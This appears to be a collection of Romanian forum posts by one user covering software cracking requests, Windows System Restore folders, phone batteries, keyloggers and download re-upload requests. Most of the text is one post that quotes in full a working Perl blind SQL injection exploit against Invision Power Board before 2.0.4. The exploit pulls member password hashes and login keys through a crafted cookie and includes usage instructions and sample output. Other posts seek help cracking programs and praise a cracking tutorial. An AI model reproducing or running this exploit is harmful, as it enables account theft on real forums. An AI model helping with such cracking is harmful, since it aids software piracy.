Renegade

21

Chiar as ruga pe cineva sa ne explice cum sa crackui un program.Un tutorial chiar si scris ar fii bine venit(metoda ce mai simpla si usor de inteles).Va multumesc.

Eu am gasit exploitul,dar cand am dat sa salveze in .pl a sarit nod32.In acest caz am abandonat lucrul cu el. Uite exploitul: #!/usr/bin/perl ## Invision Power Board SQL injection exploit by RST/GHC ## vulnerable forum versions : 1.* , 2.* (<2.0.4) ## tested on version 1.3 Final and version 2.0.2 ## * work on all mysql versions ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On) ## (c)oded by 1dt.w0lf ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## screen: ## ~~~~~~~ ## r57ipb2.pl blah.com /ipb13/ 1 0 ## [~] SERVER : blah.com ## [~] PATH : /ipb13/ ## [~] MEMBER ID : 1 ## [~] TARGET : 0 - IPB 1.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99 ## ## r57ipb2.pl blah.com /ipb202/ 1 1 ## [~] SERVER : blah.com ## [~] PATH : /ipb202/ ## [~] MEMBER ID : 1 ## [~] TARGET : 1 - IPB 2.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Greets: James Bercegay of the GulfTech Security Research Team ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Credits: RST/GHC , [url]http://rst.void.ru[/url] , [url]http://ghc.ru[/url] ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use IO::Socket; if (@ARGV < 4) { &usage; } $server = $ARGV[0]; $path = $ARGV[1]; $member_id = $ARGV[2]; $target = $ARGV[3]; $pass = ($target)?('member_login_key')'password'); $server =~ s!(http:\/\/)!!; $request = 'http://'; $request .= $server; $request .= $path; $s_num = 1; $|++; $n = 0; print "[~] SERVER : $server\r\n"; print "[~] PATH : $path\r\n"; print "[~] MEMBER ID : $member_id\r\n"; print "[~] TARGET : $target"; print (($target)?(' - IPB 2.*')' - IPB 1.*')); print "\r\n"; print "[~] SEARCHING PASSWORD ... [|]"; ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; while(1) { if(&found(47,58)==0) { &found(96,122); } $char = $i; if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] MEMBER ID : $member_id }; print (($target)?('MEMBER_LOGIN_KEY : ')'PASSWORD : ')); print $allchar."\r\n"; } else { print "\b\b FAILED ]"; } exit(); } else { $allchar .= chr(42); } $s_num++; } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D"; $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"; $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*"; $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh); while(<$socket>) { if (/Set-Cookie: session_id=0;/) { return 1; } } return 0; } sub status() { $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; } } sub usage() { print q( Invision Power Board v < 2.0.4 SQL injection exploit ---------------------------------------------------- USAGE: ~~~~~~ r57ipb2.pl [server] [/folder/] [member_id] [target] [server] - host where IPB installed [/folder/] - folder where IPB installed [member_id] - user id for brute targets: 0 - IPB 1.* 1 - IPB 2.* (Prior To 2.0.4) e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1 ---------------------------------------------------- (c)oded by 1dt.w0lf RST/GHC , [url]http://rst.void.ru[/url] , [url]http://ghc.ru[/url] ); exit(); }

Din cate stiu eu iti da Acces Denied in System Volume Information.Poti face in felul urmator.Mergi la Tools->Folder Options sectiunea View si debifezi "Hide protected operating system file (Recomaanded)" si "Use simple sharing (Recommanded)".Apoi mergi pe partitia unde ai fisierul infestat si cauti System Volume Information.Dai click dreapta pe el si la Security adaugi pe langa System userul tau (ce aapre de ex cand dai Log off ...,acel nume).Acum ai acces la System Volume Information si poti sterge.Apoi la fel faci cu click dreapta Security sa scoti userul si rebifezi inapoi la Tools->Folder Options. L.E.- Din cate stiu eu in System Volume Information sunt stocate fisierele lui System Restore(Control Panel->System).Daca vrei sa elimini tot poti sa mergi in System Propreties->System Restore(Turn off System Restore on all drivers)

Sa ai parte de laptop .

Si eu am dezactivat.Motivul...tot aveam spatiu papat(odata am avut si 7gb) si nu stiam unde este,si era in System Volume Information.

Eu tocmai mi-am luat un v630 tot cu Li-Polymer si nu am formatat-o,oricum dupa 2h-2,5h arata ca s-a incarcat complect.Am intrebat un reprezentant si a zis ca in cazul bateriilor cu Li numai este necesara formatarea.Diferenta dintre Li-Ion si Li-Polymer este in felul urmator.Puterea celor Li-Ion scade pe parcursul descarcarii bateriei iar cele Li-Polymer raman la fel pana se inchide tel.(daca el a spus prostii spun si eu).Si am mai auzit o chestie cum ca tel are un "sistem" ca la incarcarea completa a bateriei sa decupleze legatura intre sistemul de incarcare si baterie,bateria nemaifiind alimentata.

Poate spun o prostie dar K800i nu are Symbian. http://www.symbian.com/phones/index.html

Poate gresesc in ceee ce spun dar sunt keyloggere care iau in considerare si ce faci cu mouseul(click dreapta, click stanga,dublu click,apasarea scrollului) pt ca a reveni in fata cuvantului(parolei), si ar putea sa te dea de gol umpic.

Acum merge

Buna am o problema si banuiesc ca nu o am doar eu.Cand nu sunt logat ceasul de pe forum arata ora corecta.http://img180.imageshack.us/img180/4665/nelogatgb9.jpg.Daca ma loghez si apoi dai iesire si ma loghez iarasi ora ultimei vizite e in spate cu o ora,adica daca eu m-am delogat la 12:33 la relogare apare 11:33.http://img180.imageshack.us/img180/8003/logatqb7.jpg.

Am rearhivat video din arhiva asta http://rapidshare.com/files/46504223/sql-finding-by-xoron.rar dupa metoda ta si a mers super.Nu cred ca conteaza daca e facut de mine video sau nu.

Scuze ca pun o intrebare nelegata de acest subiect.Cu ce ai arhivat video de e asa mic ca arhiva dar imens dupa dezarhivare?Si cum ai fauct?PLS.

La mine se instaleaza il pot porni dar cand dau sa caute un tel dispare orice buton si trebuie sa sting si sa reaprind tel.

Eu am un Sony Ericsson K700 si nu merge

Sub7 as avea o rugaminte.Am reusit sa crackui si eu dupa tutorialul tau si as vrea sa stiu cu ce prog ai facut patchul asta -http://foff.astalavista.ms/images/sfld/patch.zip-,sau mai bine zis cum l-ai integrat si cum ai pus sunetul.

Poate sunt eu n00b,spunetimi si mie cum il execut in windows.Am instalat ActivePerl-5.6.1.638-MSWin32-x86 si nu merge.

As avea o rugaminte.Il puteti urca undeva sa il downloadez si eu pls ?

Daca il stie cineva pe Icarius va rog rugatil sa il puna pe rapidshare sau altundeva. Sper ca nu am abuzat

http://www.ripe.net

Asta e eroarea care o primesc eu,si la tine razvan?

Eu lam luat si dupa ce il dezarhivez da eroare cum ca fisierul ar fi corupt.Il pui din nou pls ?

E acelasi link de pe rapidshare. :@

Uploadeazal iarasi pls.E sters de pe rapidshare.